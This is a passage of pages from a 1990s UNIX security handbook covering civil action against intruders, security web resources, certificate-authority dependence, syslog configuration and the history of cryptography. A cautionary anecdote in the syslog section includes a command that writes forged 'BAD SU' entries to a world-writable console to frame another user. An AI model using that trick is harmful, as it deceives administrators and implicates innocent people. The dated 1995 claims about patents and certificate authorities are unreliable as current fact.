and evidence collection and trial preparation are paid for by the government. In a civil case, the<br />

gathering of evidence and the preparation of trial material is done by your lawyers - and you pay<br />

for it. Good lawyers still charge more than most computer consultants; therefore, the cost of<br />

preparing even a minor suit may be quite high. If you win your case, you may be able to have your<br />

lawyers' fees included in your award, but don't count on such provisions. Note, however, that<br />

criminal cases may sometimes be used as the basis for later civil action.<br />

The preparation and scheduling of a lawsuit may take many years. In the meantime, unless you are<br />

able to get temporary injunctions, whatever behavior that you are seeking to punish may continue.<br />

The delay can also continue to increase the cost of your preparation.<br />

You may not win a civil case. Even if you do win, it's possible that your opponent will not have<br />

any resources with which to pay damages or your lawyer fees, and so you therefore may be out a<br />

considerable sum of money without any satisfaction other than the moral victory of a court<br />

decision in your favor. What's more, your opponent can always appeal - or countersue.<br />

The vast majority of civil cases are settled out of court. Simply beginning the process of bringing suit<br />

may be sufficient to force your opponent into a settlement. If all you are seeking is to stop someone from<br />

breaking into your system, or force someone to repay you for stolen computer time or documents, a<br />

lawsuit may be an appropriate course of action. In many cases, especially those involving juveniles<br />

trying to break into your system, having a lawyer send an official letter of complaint demanding an<br />

immediate stop to the activity may be a cheap and effective way of achieving your goal.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch26_03.htm (1 of 2) [2002-04-12 10:45:29]


[Chapter 26] 26.3 Civil Actions<br />

As with other legal matters, you should consult with a trained attorney to discuss trade-offs and<br />

alternatives. There is a wide range of possibilities available to you depending on your locale, the nature<br />

of your complaint, and the nature of your opponent (business, individual, etc.).<br />

Never threaten a lawsuit without prior legal advice. Such threats may lead to problems you don't need -<br />

or want.<br />

26.2 Criminal Prosecution 26.4 Other Liability<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch26_03.htm (2 of 2) [2002-04-12 10:45:29]


[Appendix E] E.3 WWW Pages<br />

E.3 WWW Pages<br />

Appendix E<br />

Electronic Resources<br />

There are dozens of WWW pages with pointers to other information. Some pages are comprehensive,<br />

and others are fairly narrow in focus. The ones we list here provide a good starting point for any<br />

browsing you might do. You will find most of the other useful directories linked into one or more of<br />

these pages, and you can then build your own set of "bookmarks."<br />

E.3.1 CIAC<br />

The staff of the CIAC keep a good archive of tools and documents available on their site. This archive<br />

includes copies of their notes and advisories, and some locally developed software:<br />

http://ciac.llnl.gov<br />

E.3.2 COAST<br />

COAST (Computer Operations, Audit, and <strong>Sec</strong>urity Technology) is a multi-project, multi-investigator<br />

effort in computer security research and education in the Computer Sciences Department at Purdue<br />

University. It is intended to function with close ties to researchers and engineers in major companies and<br />

government agencies. COAST focuses on real-world research needs and limitations. (See the sidebar.)<br />

The WWW hotlist index at COAST is the most comprehensive list of its type available on the <strong>Internet</strong> as<br />

of the publication of this edition:<br />

http://www.cs.purdue.edu/coast/coast.html<br />

E.3.3 FIRST<br />

The FIRST (Forum of Incident Response and <strong>Sec</strong>urity Teams) <strong>Sec</strong>retariat maintains a large archive of<br />

material, including pointers to WWW pages for other FIRST teams:<br />

http://www.first.org/first<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appe_03.htm (1 of 2) [2002-04-12 10:45:29]


[Appendix E] E.3 WWW Pages<br />

E.3.4 NIH<br />

The WWW index page at NIH provides a large set of pointers to internal collections and other archives:<br />

http://www.alw.nih.gov/<strong>Sec</strong>urity/security.html<br />

E.3.5 Telstra<br />

Telstra Corporation maintains a comprehensive set of WWW pages on the topic of <strong>Internet</strong> and network<br />

security at:<br />

http://www.telstra.com.au/info/security.html<br />

E.2 Usenet Groups E.4 Software Resources<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appe_03.htm (2 of 2) [2002-04-12 10:45:29]


[Chapter 18] 18.6 Dependence on Third Parties<br />

Chapter 18<br />

WWW <strong>Sec</strong>urity<br />

18.6 Dependence on Third Parties<br />

It is impossible to eliminate one's dependence on other individuals and organizations. Computers need<br />

electricity to run, which makes most computer users dependent on their power company for continued<br />

operations. You can purchase an electrical generator or a solar power system, but this simply shifts the<br />

dependence from the power company to the firm that supplies the fuel to the generator, or the firm that<br />

makes replacement parts for the solar power system.[7]<br />

[7] There is also a dependence on the continued operation of Sol itself.<br />

Most organizations attempt to limit their risk by arranging for multiple suppliers of their key resources.<br />

For example, you might purchase your electricity from a utility, but have a diesel generator for backup. If<br />

you are a newspaper, you might have several suppliers for paper. That way, if you have a dispute with<br />

one supplier, you can still publish your newspaper by buying from another.<br />

Likewise, it is important to be sure that you have multiple suppliers for all of your key computer<br />

resources. It is unwise to be in a position where the continued operation of your business depends on<br />

your continued relationship with an outside supplier, because this gives the supplier control over your<br />

business.<br />

Today, there are many choices for organizations that are deploying Web servers. Web servers can be run<br />

on a wide variety of platforms, including <strong>UNIX</strong>, Windows, and Macintosh. And there are many different<br />

Web servers available for the same hardware.<br />

There are fewer choices available when organizations need to purchase secure Web servers - that is, Web<br />

servers that provide for cryptographic protection of data and authentication of their users. This restriction<br />

is a result of the fact that the use of public-key cryptography in the United States will be covered by<br />

patents until the year 1997 (in the case of the Diffie-Hellman and Hellman-Merkle patents) or the year<br />

2000 (in the case of the RSA patent). Currently, the use of these patents is controlled by two companies,<br />

Cylink, based in Sunnyvale, Calif., and RSA Data <strong>Sec</strong>urity, based in Redwood City, California. Because<br />

of the existence of these patents, and because of the widespread adoption of the RSA technology by the<br />

Web community, it is highly unlikely that a server that implements cryptographic security will be<br />

produced and sold in the United States that is not licensed, directly or indirectly, by RSA Data <strong>Sec</strong>urity.<br />

One of the primary purposes of encryption is to provide absolute assurances to consumers that when the<br />

consumer contacts a Web server, the Web server actually belongs to the company to which it claims to<br />

belong. You can't trust the Web server itself. So companies such as Netscape Communications have<br />

turned to a trusted third party, Verisign Inc. Netscape has embedded Verisign's public key in both its<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch18_06.htm (1 of 2) [2002-04-12 10:45:29]


[Chapter 18] 18.6 Dependence on Third Parties<br />

<strong>Sec</strong>ure Commerce Server and its Web browser. The browser will not switch into its secure, encrypted<br />

mode unless it is presented a digital ID from the server that is signed by Verisign's secret key.<br />

And Netscape is not alone. At the time of this writing (December 1995), all secure Web servers and<br />

browsers used Verisign as their trusted certification authority. Although there are plans for other such<br />

authorities, none currently exist.<br />

This presents businesses with a dilemma. The reason is that digital ID's signed by Verisign must be<br />

renewed every year to remain valid. But Verisign is under no legal obligation to renew the IDs. This<br />

means that, should a dispute arise between Verisign and a company using a secure Web browser,<br />

Verisign could simply choose not to renew the company's key, and the company would lose the<br />

cryptographic capabilities of its program. Note this is not a problem with Verisign, per se, but with the<br />

whole scheme of certification authorities with whom you have no direct contractual relationship.<br />

There are several solutions to this problem. The obvious one is for there to be alternative certification<br />

authorities, and for browsers and servers to accept digital identification credentials from any certification<br />

authority, giving the user the choice of whether or not the authority should be trusted. We have been told<br />

that these changes will be made in a future version of Netscape's Navigator. But we include this<br />

discussion to illustrate the risk of depending on third parties. Even if these risks are minimized in the<br />

Netscape products, third-party dependencies are likely to continue in many different forms. Be on the<br />

lookout for them!<br />

18.5 Risks of Web Browsers 18.7 Summary<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch18_06.htm (2 of 2) [2002-04-12 10:45:29]


[Chapter 10] 10.5 The <strong>UNIX</strong> System Log (syslog) Facility<br />

Chapter 10<br />

Auditing and Logging<br />

10.5 The <strong>UNIX</strong> System Log (syslog) Facility<br />

In addition to the various logging facilities mentioned above, many versions of <strong>UNIX</strong> provide a general-purpose<br />

logging facility called syslog, originally developed at the University of California at Berkeley for the Berkeley<br />

sendmail program. Since then, syslog has been ported to several System V-based systems, and is now widely<br />

available. The uses of syslog have similarly been expanded.<br />

syslog is a host-configurable, uniform system logging facility. The system uses a centralized system logging process<br />

that runs the program /etc/syslogd or /etc/syslog. Individual programs that need to have information logged send the<br />

information to syslog. The messages can then be logged to various files, devices, or computers, depending on the<br />

sender of the message and its severity.<br />

Any program can generate a syslog log message. Each message consists of four parts:<br />

●<br />

●<br />

●<br />

●<br />

Program name<br />

Facility<br />

Priority<br />

Log message itself<br />

For example, the message:<br />

login: Root LOGIN REFUSED on ttya<br />

is a log message generated by the login program. It means that somebody tried to log into an unsecure terminal as<br />

root. The messages's facility (authorization) and error level (critical error) are not shown.<br />

The syslog facilities are summarized in Table 10.1. Not all facilities are present on all versions of <strong>UNIX</strong>.<br />

Table 10.1: syslog Facilities<br />

Name Facility<br />

kern Kernel<br />

user Regular user processes<br />

mail Mail system<br />

lpr Line printer system<br />

auth Authorization system, or programs that ask for user names and passwords (login, su, getty, ftpd, etc.)<br />

daemon Other system daemons<br />

news News subsystem<br />

uucp UUCP subsystem<br />

local0... local7 Reserved for site-specific use<br />

mark A timestamp facility that sends out a message every 20 minutes<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch10_05.htm (1 of 7) [2002-04-12 10:45:30]


[Chapter 10] 10.5 The <strong>UNIX</strong> System Log (syslog) Facility<br />

The syslog priorities are summarized in Table 10-2:<br />

Table 10.2: syslog Priorities<br />

Priority Meaning<br />

emerg Emergency condition, such as an imminent system crash, usually broadcast to all users<br />

alert Condition that should be corrected immediately, such as a corrupted system database<br />

crit Critical condition, such as a hardware error<br />

err Ordinary error<br />

warning Warning<br />

notice Condition that is not an error, but possibly should be handled in a special way<br />

info Informational message<br />

debug Messages that are used when debugging programs<br />

none Do not send messages from the indicated facility to the selected file. For example, specifying<br />

*.debug;mail.none sends all messages except mail messages to the selected file.<br />

When syslogd starts up, it reads its configuration file, usually /etc/syslog.conf, to determine what kinds of events it<br />

should log and where they should be logged. syslogd then listens for log messages from three sources, shown in Table<br />

10.3.<br />

Table 10.3: Log Message Sources<br />

Source Meaning<br />

/dev/klog Special device, used to read messages generated by the kernel<br />

/dev/log <strong>UNIX</strong> domain socket, used to read messages generated by processes running on the local machine<br />

UDP port 514 <strong>Internet</strong> domain socket, used to read messages generated over the local area network from other<br />

machines<br />

10.5.1 The syslog.conf Configuration File<br />

The /etc/syslog.conf file controls where messages are logged. A typical syslog.conf file might look like this:<br />

*.err;kern.debug;auth.notice /dev/console<br />

daemon,auth.notice /var/adm/messages<br />

lpr.* /var/adm/lpd-errs<br />

auth.* root,nosmis<br />

auth.* @prep.ai.mit.edu<br />

*.emerg *<br />

*.alert |dectalker<br />

mark.* /dev/console<br />

NOTE: The format of the syslog.conf configuration file may vary from vendor to vendor. Be sure to<br />

check the documentation for your own system.<br />

Each line of the file contains two parts:<br />

●<br />

●<br />

A selector that specifies which kind of messages to log (e.g., all error messages or all debugging messages from<br />

the kernel).<br />

An action field that says what should be done with the message (e.g., put it in a file or send the message to a<br />

user's terminal).<br />

NOTE: You must use the tab character between the selector and the action field. If you use a space, it<br />

will look the same, but syslog will not work.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch10_05.htm (2 of 7) [2002-04-12 10:45:30]


[Chapter 10] 10.5 The <strong>UNIX</strong> System Log (syslog) Facility<br />

Message selectors have two parts: a facility and a priority. kern.debug, for example, selects all debug messages (the<br />

priority) generated by the kernel (the facility). It also selects all priorities that are greater than debug. An asterisk in<br />

place of either the facility or the priority indicates "all." (That is, *.debug means all debug messages, while kern.*<br />

means all messages generated by the kernel.) You can also use commas to specify multiple facilities. Two or more<br />

selectors can be grouped together by using a semicolon. (Examples are shown above.)<br />

The action field specifies one of five actions:[7]<br />

●<br />

●<br />

●<br />

●<br />

●<br />

[7] Some versions of syslog support additional actions, such as logging to a proprietary error management<br />

system.<br />

Log to a file or a device. In this case, the action field consists of a filename (or device name), which must start<br />

with a forward slash (e.g., /var/adm/lpd-errs or /dev/console). [8]<br />

[8] Beware: logging to /dev/console creates the possibility of a denial of service attack. If you are<br />

logging to the console, an attacker can flood your console with log messages, rendering it<br />

unusable.<br />

Send a message to a user. In this case, the action field consists of a username (e.g., root). You can specify<br />

multiple usernames by separating them with commas (e.g., root,nosmis). The message is written to each<br />

terminal where these users are shown to be logged in, according to the utmp file.<br />

Send a message to all users. In this case, the action field consists of an asterisk (e.g., *).<br />

Pipe the message to a program. In this case, the program is specified after the <strong>UNIX</strong> pipe symbol (|). [9]<br />

[9] Some versions of syslog do not support logging to programs.<br />

Send the message to the syslog on another host. In this case, the action field consists of a hostname, preceded by<br />

an at sign (e.g., @prep.ai.mit.edu.).<br />

With the following explanation, understanding the typical syslog.conf configuration file as shown earlier becomes<br />

easy.<br />

*.err;kern.debug;auth.notice /dev/console<br />

This line causes all error messages, all kernel debug messages, and all notice messages generated by the<br />

authorization system to be printed on the system console. If your system console is a printing terminal, this<br />

process will generate a permanent hardcopy that you can file and use for later reference. (Note that kern.debug<br />

means all messages of priority debug and above.)<br />

daemon,auth.notice /var/adm/messages<br />

This line causes all notice messages from either the system daemons or the authorization system to be appended<br />

to the file /var/adm/messages.<br />

Note that this is the second line that mentions auth.notice messages. As a result, auth.noticemessages will be<br />

sent to both the console and the messages file.<br />

lpr.* /var/adm/lpd-errs<br />

This line causes all messages from the line printer system to be appended to the /var/adm/lpd-errs file.<br />

auth.* root,nosmis<br />

This line causes all messages from the authorization system to be sent to the users root and nosmis. Note,<br />

however, that if the users are not logged in, the messages will be lost.<br />

auth.* @prep.ai.mit.edu<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch10_05.htm (3 of 7) [2002-04-12 10:45:30]


[Chapter 10] 10.5 The <strong>UNIX</strong> System Log (syslog) Facility<br />

This line causes all authorization messages to be sent to the syslog daemon on the computer prep.ai.mit.edu. If<br />

you have a cluster of many different machines, you may wish to have them all perform their loggings on a<br />

central (and presumably secure) computer.<br />

*.emerg *<br />

This line causes all emergency messages to be displayed on every user's terminal.<br />

*.alert |dectalker<br />

This line causes all alert messages to be sent to a program called dectalker, which might broadcast the message<br />

over a public address system.<br />

mark.* /dev/console<br />

This line causes the time to be printed on the system console every 20 minutes. This is useful if you have other<br />

information being printed on the console and you want a running clock on the printout.<br />

NOTE: By default, syslog will accept log messages from arbitrary hosts sent to the local syslog UDP<br />

port. This can result in a denial of service attack when the port is flooded with messages faster than the<br />

syslog daemon can process them. Individuals can also log fraudulent messages. You must properly screen<br />

your network against outside log messages.<br />

10.5.2 Where to Log<br />

Because the syslog facility provides many different logging options, this gives individual sites flexibility in setting up<br />

their own logging. Different kinds of messages can be handled in different ways. For example, most users won't want<br />

to be bothered with most log messages. On the other hand, auth.crit messages should be displayed on the system<br />

administrator's screen (in addition to being recorded in a file). This section describes a few different approaches.<br />

10.5.2.1 Logging to a printer<br />

If you have a printer you wish to devote to system logging, you can connect it to a terminal port and specify that port<br />

name in the /etc/syslog.conf file.<br />

For example, you might connect a special-purpose printer to the port /dev/ttya. You can then log all messages from the<br />

authorization system (such as invalid passwords) by inserting the following line in your syslog.conf file:<br />

auth.* /dev/ttya<br />

A printer connected in such a way should only be used for logging. We suggest using dot-matrix printers, rather than<br />

laser printers, because dot-matrix printers allow you to view the log line by line as it is written, rather than waiting<br />

until an entire page is completed.<br />

Logging to a hardcopy device is a very good idea if you think that your system is being visited by unwelcome<br />

intruders on a regular basis. The intruders can erase log files, but after something is sent to a printer, they cannot touch<br />

the printer output without physically breaking into your establishment.[10]<br />

[10] Although if they have superuser access they can temporarily stop logging or change what is logged.<br />

NOTE: Be sure that you do not log solely to a hardcopy device. Otherwise, you will lose valuable<br />

information if the printer jams or runs out of paper, the ribbon breaks, or somebody steals the paper<br />

printout.<br />

10.5.2.2 Logging across the network<br />

If you have several machines connected together by a TCP/IP network, you may wish to have events from all of the<br />

machines logged on one (or more) log machines. If this machine is secure, the result will be a log file that can't be<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch10_05.htm (4 of 7) [2002-04-12 10:45:30]


[Chapter 10] 10.5 The <strong>UNIX</strong> System Log (syslog) Facility<br />

altered, even if the security on the other machines is compromised.* To have all of the messages from one computer<br />

sent to another computer, you simply insert this line in the first computer's syslog.conf file:<br />

*.* @loghost<br />

This feature can cause a lot of network traffic. Instead, you limit your log to only "important" messages. For example,<br />

this log file would simply send the hardware and security-related messages to the remote logging host, but keep some<br />

copies on the local host for debugging purposes:<br />

*.err;kern.debug;auth.notice /dev/console<br />

daemon,auth.notice /var/adm/messages<br />

lpr.* @loghost1,@loghost2<br />

auth.* @loghost1,@loghost2<br />

*.emerg @loghost1,@loghost2<br />

*.alert @loghost1,@loghost2<br />

mark.* /dev/console<br />

Logging to another host adds to your overall system security: even if people break into one computer and erase its log<br />

files, they will still have to deal with the log messages sent across the network to the other system. If you do log to a<br />

remote host, you might wish to restrict user accounts on that machine. However, be careful: if you only log over the<br />

network to a single host, then that one host is a single point of failure. The above example logs to both loghost1 and<br />

loghost2.<br />

Another alternative is to use a non-<strong>UNIX</strong> machine as the log host. The syslog code can be compiled on other machines<br />

with standard C and TCP/IP libraries. Thus, you can log to a DOS or Macintosh machine, and further protect your<br />

logs. After all, if syslog is the only network service running on those systems, there is no way for someone to break in<br />

from the net to alter the logs!<br />

10.5.2.3 Logging everything everywhere<br />

Disks are cheap these days. Sites with sufficient resources and adequately trained personnel sometimes choose to log<br />

everything that might possibly be useful, and log it in many different places. For example, clients can create their own<br />

log files of syslog events, and also send all logging messages to several different logging hosts - possibly on different<br />

networks.<br />

The advantage of logging in multiple places is that it makes an attacker's attempts at erasing any evidence of his<br />

presence much more difficult. On the other hand, multiple log files will not do you any good if they are never<br />

examined. Furthermore, if they are never pruned, they may grow so large that they will shut down your computers.<br />

10.5.3 syslog Messages<br />

The following tables[11] summarize some typical messages available on various versions of <strong>UNIX</strong>.:<br />

[11] A similar list is not available for System V <strong>UNIX</strong>, because syslog is part of the Berkeley <strong>UNIX</strong><br />

offering. Companies that sell syslog with their System V offerings may or may not have modified the<br />

additional programs in their operating systems to allow them to use the syslog logging facility.<br />

Program Message<br />

Table 10.4: Typical Critical Messages<br />

Meaning<br />

halt halted by used the /etc/halt command to shut down the<br />

system.<br />

login ROOT LOGIN REFUSED ON [FROM<br />

]<br />

root tried to log onto a terminal that is not secure.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch10_05.htm (5 of 7) [2002-04-12 10:45:30]


[Chapter 10] 10.5 The <strong>UNIX</strong> System Log (syslog) Facility<br />

login REPEATED LOGIN FAILURES ON Somebody tried to log in as and supplied a bad<br />

[FROM ] <br />

password more than five times.<br />

reboot rebooted by rebooted the system with the /etc/reboot<br />

command.<br />

su BAD SU on Somebody tried to su to the superuser and did not<br />

supply the correct password.<br />

shutdown reboot, halt, or shutdown by on used the /etc/shutdown command to reboot,<br />

halt, or shut down the system.<br />

Other critical conditions that might be present might include messages about full filesystems, device failures, or<br />

network problems.<br />

Table 10.5: Typical Info Messages<br />

Program Message Meaning<br />

date date set by changed the system date.<br />

login ROOT LOGIN [FROM ]<br />

root logged in.<br />

su on used the su command to become the superuser.<br />

getty /bin/getty was unable to open .<br />

NOTE: For security reasons, some information should never be logged. For example, although you<br />

should log failed password attempts, you should not log the password that was used in the failed attempt.<br />

Users frequently mistype their own passwords, and logging these mistyped passwords would help a<br />

computer cracker break into a user's account. Some system administrators believe that the account name<br />

should also not be logged on failed login attempts - especially when the account typed by the user is<br />

nonexistent. The reason is that users occasionally type their passwords when they are prompted for their<br />

usernames. If invalid accounts are logged, then it might be possible for an attacker to use those logs to<br />

infer people's passwords.<br />

You may want to insert syslog calls into your own programs to record information of importance. Third-party software<br />

also often has a capability to send log messages into the syslog if configured correctly. For example, Xyplex terminal<br />

servers and Cisco routers both can log information to a network syslog daemon; Usenet news and POP mail servers<br />

also log information.<br />

If you are writing shell scripts, you can also log to syslog. Usually, systems with syslog come with the logger<br />

command. To log a warning message about a user trying to execute a shell file with invalid parameters, you might<br />

include:<br />

logger -t ThisProg -p user.notice "Called without required # of parameters"<br />

NOTE: Prior to 1995, many versions of the syslog library call did not properly check their inputs to be<br />

certain that the data would fit into the function's internal buffers. Thus, many programs could be coerced<br />

to accept input to write arbitrary data over their stacks, leading to potential compromise. Be certain that<br />

you are running software using a version of syslog that does not have this vulnerability.<br />

10.5.3.1 Beware false log entries<br />

The <strong>UNIX</strong> syslog facility allows any user to create log entries. This capability opens up the possibility for false data to<br />

be entered into your logs. An interesting story of such logging was given to us by Alec Muffet:<br />

A friend of mine - a <strong>UNIX</strong> sysadmin - enrolled as a mature student at a local polytechnic in order to<br />

secure the degree which had been eluding him for the past four years.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch10_05.htm (6 of 7) [2002-04-12 10:45:30]


[Chapter 10] 10.5 The <strong>UNIX</strong> System Log (syslog) Facility<br />

One of the other students on his Computer Science course was an obnoxious geek user who was shoulder<br />

surfing people and generally making a nuisance of himself, and so my friend determined to take revenge.<br />

The site was running an early version of Ultrix on an 11/750, but the local operations staff were<br />

somewhat paranoid about security, had removed world execute from "su" and left it group-execute to<br />

those in the wheel group, or similar; in short, only the sysadmin staff should have execute access for su.<br />

Hence, the operations staff were somewhat worried to see messages with the following scrolling up the<br />

console:<br />

BAD SU: geekuser ON ttyp4 AT 11:05:20<br />

BAD SU: geekuser ON ttyp4 AT 11:05:24<br />

BAD SU: geekuser ON ttyp4 AT 11:05:29<br />

BAD SU: geekuser ON ttyp4 AT 11:05:36<br />

...<br />

When the console eventually displayed:<br />

SU: geekuser ON ttyp4 AT 11:06:10<br />

all hell broke loose: the operations staff panicked at the thought of an undergrad running around the<br />

system as root and pulled the plug (!) on the machine. The system administrator came into the terminal<br />

room, grabbed the geekuser, took him away and shouted at him for half an hour, asking (a) why was he<br />

hacking, (b) how was he managing to execute su and (c) how he had guessed the root password?<br />

Nobody had noticed my friend in the corner of the room, quietly running a script which periodically<br />

issued the following command, redirected into /dev/console, which was world-writable:<br />

echo BAD SU: geekuser ON ttyp4 AT `date`<br />

The moral of course is that you shouldn't panic, and that you should treat your audit trail with suspicion.<br />

10.4 Per-User Trails in the<br />

Filesystem<br />

10.6 Swatch: A Log File Tool<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch10_05.htm (7 of 7) [2002-04-12 10:45:30]


[Chapter 6] Cryptography<br />

6. Cryptography<br />

Contents:<br />

A Brief History of Cryptography<br />

What Is Encryption?<br />

The Enigma Encryption System<br />

Common Cryptographic Algorithms<br />

Message Digests and Digital Signatures<br />

Encryption Programs Available for <strong>UNIX</strong><br />

Encryption and U.S. Law<br />

Chapter 6<br />

Cryptography is the science and art of secret writing - keeping information secret.[1] When applied in a<br />

computing environment, cryptography can protect data against unauthorized disclosure; it can<br />

authenticate the identity of a user or program requesting service; and it can disclose unauthorized<br />

tampering. In this chapter, we'll survey some of those uses, and present a brief summary of encryption<br />

methods that are often available in <strong>UNIX</strong> systems.<br />

[1] Cryptanalysis is the related study of breaking ciphers. Cryptology is the combined study<br />

of cryptography and cryptanalysis.<br />

Cryptography is an indispensable part of modern computer security.<br />

6.1 A Brief History of Cryptography<br />

Knowledge of cryptography can be traced back to ancient times. It's not difficult to understand why: as<br />

soon as three people had mastered the art of reading and writing, there was the possibility that two of<br />

them would want to send letters to each other that the third could not read.<br />

In ancient Greece, the Spartan generals used a form of cryptography so that the generals could exchange<br />

secret messages: the messages were written on narrow ribbons of parchment that were wound spirally<br />

around a cylindrical staff called a scytale. After the ribbon was unwound, the writing on it could only be<br />

read by a person who had a matching cylinder of exactly the same size. This primitive system did a<br />

reasonably good job of protecting messages from interception and from the prying eyes of the message<br />

courier as well.<br />

In modern times, cryptography's main role has been in securing electronic communications. Soon after<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch06_01.htm (1 of 4) [2002-04-12 10:45:31]


[Chapter 6] Cryptography<br />

Samuel F. B. Morse publicly demonstrated the telegraph in 1845, users of the telegraph began worrying<br />

about the confidentiality of the messages that were being transmitted. What would happen if somebody<br />

tapped the telegraph line? What would prevent unscrupulous telegraph operators from keeping a copy of<br />

the messages that they relayed and then divulging them to others? The answer was to encode the<br />

messages with a secret code, so that nobody but the intended recipient could decrypt them.<br />

Cryptography became even more important with the invention of radio, and its use in war. Without<br />

cryptography, messages transmitted to or from the front lines could easily be intercepted by the enemy.<br />

6.1.1 Code Making and Code Breaking<br />

As long as there have been code makers, there have been code breakers. Indeed, the two have been<br />

locked in a competition for centuries, with each advance on one side being matched by counter-advances<br />

on the other.<br />

For people who use codes, the code-breaking efforts of cryptanalysts pose a danger that is potentially<br />

larger than the danger of not using cryptography in the first place. Without cryptography, you might be<br />

reluctant to send sensitive information through the mail, across a telex, or by radio. But if you think that<br />

you have a secure channel of communication, then you might use it to transmit secrets that should not be<br />

widely revealed.<br />

For this reason, cryptographers and organizations that use cryptography routinely conduct their own<br />

code-breaking efforts to make sure that their codes are resistant to attack. The findings of these<br />

self-inflicted intrusions are not always pleasant. The following brief story from a 1943 book on<br />

cryptography demonstrates this point quite nicely:<br />

[T]he importance of the part played by cryptographers in military operations was<br />

demonstrated to us realistically in the First World War. One instructive incident occurred in<br />

September 1918, on the eve of the great offensive against Saint-Mihiel. A student<br />

cryptographer, fresh from Washington, arrived at United States Headquarters at the front.<br />

Promptly he threw the General Staff into a state of alarm by decrypting with comparative<br />

ease a secret radio message intercepted in the American sector.<br />

The smashing of the German salient at Saint-Mihiel was one of the most gigantic tasks<br />

undertaken by the American forces during the war. For years that salient had stabbed into<br />

the Allied lines, cutting important railways and communication lines. Its lines of defense<br />

were thought to be virtually impregnable. But for several months the Americans had been<br />

making secret preparations for attacking it and wiping it out. The state was set, the minutest<br />

details of strategy had been determined - when the young officer of the United States<br />

Military Intelligence spread consternation through our General Staff.<br />

The dismay at Headquarters was not caused by any new information about the strength of<br />

the enemy forces, but by the realization that the Germans must know as much about our<br />

secret plans as we did ourselves - even the exact hour set for the attack. The `intercepted'<br />

message had been from our own base. German cryptographers were as expert as any in the<br />

world, and what had been done by an American student cryptographer could surely have<br />

been done by German specialists.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch06_01.htm (2 of 4) [2002-04-12 10:45:31]


[Chapter 6] Cryptography<br />

The revelation was even more bitter because the cipher the young officer had broken,<br />

without any knowledge of the system, was considered absolutely safe and had long been<br />

used for most important and secret communications.[2]<br />

[2] Smith, Laurence Dwight. Cryptography: The Science of <strong>Sec</strong>ret Writing.<br />

Dover Publications, New York, 1941.<br />

6.1.2 Cryptography and Digital Computers<br />

Modern digital computers are, in some senses, the creations of cryptography. Some of the first digital<br />

computers were built by the Allies to break messages that had been encrypted by the Germans with<br />

electromechanical encrypting machines. Code breaking is usually a much harder problem than code<br />

making; after the Germans switched codes, the Allies often took several months to discover the new<br />

coding systems. Nevertheless, the codes were broken, and many historians say that World War II was<br />

shortened by at least a year as a result.<br />

Things really picked up when computers were turned to the task of code making. Before computers, all<br />

of cryptography was limited to two basic techniques: transposition, or rearranging the order of letters in a<br />

message (such as the Spartan's scytale), and substitution, or replacing one letter with another one. The<br />

most sophisticated pre-computer cipher used five or six transposition or substitution operations, but<br />

rarely more.<br />

With the coming of computers, ciphers could be built from dozens, hundreds, or thousands of complex<br />

operations, and yet could still encrypt and decrypt messages in a short amount of time. Computers have<br />

also opened up the possibility of using complex algebraic operations to encrypt messages. All of these<br />

advantages have had a profound impact on cryptography.<br />

6.1.3 Modern Controversy<br />

In recent years, encryption has gone from being an arcane science and the stuff of James Bond movies, to<br />

being the subject of debate in several nations (but we'll focus on the case in the U.S. in the next few<br />

paragraphs). In the U.S. that debate is playing itself out on the front pages of newspapers such as The<br />

New York Times and the San Jose Mercury News.<br />

On one side of the debate are a large number of computer professionals, civil libertarians, and perhaps a<br />

majority of the American public, who are rightly concerned about their privacy and the secrecy of their<br />

communications. These people want the right and the ability to protect their data with the most powerful<br />

encryption systems possible.<br />

On the other side of the debate are the United States Government, members of the nation's law<br />

enforcement and intelligence communities, and (apparently) a small number of computer professionals,<br />

who argue that the use of cryptography should be limited because it can be used to hide illegal activities<br />

from authorized wiretaps and electronic searches.<br />

MIT Professor Ronald Rivest has observed that the controversy over cryptography fundamentally boils<br />

down to one question:<br />

Should the citizens of a country have the right to create and store documents which their<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch06_01.htm (3 of 4) [2002-04-12 10:45:31]


[Chapter 6] Cryptography<br />

government cannot read?[3]<br />

[3] Rivest, Ronald, speaking before the MIT Telecommunications Forum,<br />

Spring 1994.<br />

This chapter does not address this question. Nor do we attempt to explore the U.S. Government's[4]<br />

claimed need to eavesdrop on communications, the fear that civil rights activists have of governmental<br />

abuse, or other encryption policy issues. Although those are interesting and important questions -<br />

questions you should also be concerned with as a computer user - they are beyond the scope of this book.<br />

Instead, we focus on discussion of the types of encryption that are available to most <strong>UNIX</strong> users today<br />

and those that are likely to be available in the near future. If you are interested in the broader questions of<br />

who should have access to encryption, we suggest that you pursue some of the references listed in<br />

